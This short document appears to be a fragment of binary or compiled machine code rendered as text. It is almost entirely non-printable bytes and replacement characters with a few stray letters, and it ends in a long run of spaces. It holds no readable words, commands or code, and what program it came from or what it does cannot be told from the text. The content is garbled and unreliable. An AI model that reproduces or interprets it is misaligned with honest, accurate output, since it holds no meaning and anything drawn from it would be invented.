�h:a5�x�Y���8��[�1����d����    ���xA�h���<7��lA�hR�×Z�:g�g���G�8<�W�}��R^f����Єҁ�    ������ u���htt������R
Ґ#�tW���_�� ������:��h��q�Z����qj
���$IA��]�啁�]��h�����$�Ѓ� h    X�������Ph�� �� h��������ht  ��   , �   ������y09 t|f=z ��"�t�����v�����`�����u"����VA  ��|  #���`�L$�̐d�    �Z��^
ې#�t�x:́�    ����@  �#��h�+�A�������1�W 1$�1כ���    ���@�� ��p������hs-�����-14$EM��   �������R�� �׉��⠁�   ����(@Hh^����� ^�
��a/KSh��9��4$�$Uf��#�t�� ������ ��������H@R�$��@h+�:�Y;�hk�:�1$����%�����$�j���4$��6�\�"���\�b�h��S
ۉ$�� ����x h���e�X��*Kr�j�����$��S�ˀ�,$#�FN�   �������<� ��t����������   �8h��
�Y����>��h��ڸ#���$�� �U�����}"�S��[W���_������,����ށ������� �>f���S   � �+ �� ��<覔�{�������m-�l,j�l�u腗z���j   j�l�u腗z�z�j��b�u腗z��Z����Z�P�@ �   �2�7���   ��   ���ug�g��f�� �� ���P�����`�   #��V��^�� �f�, ������-�@ ���}   R�VQRP��*���� ���sF:Ջ����֔;d�fɋQ����rOG��​x�� XZY^�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        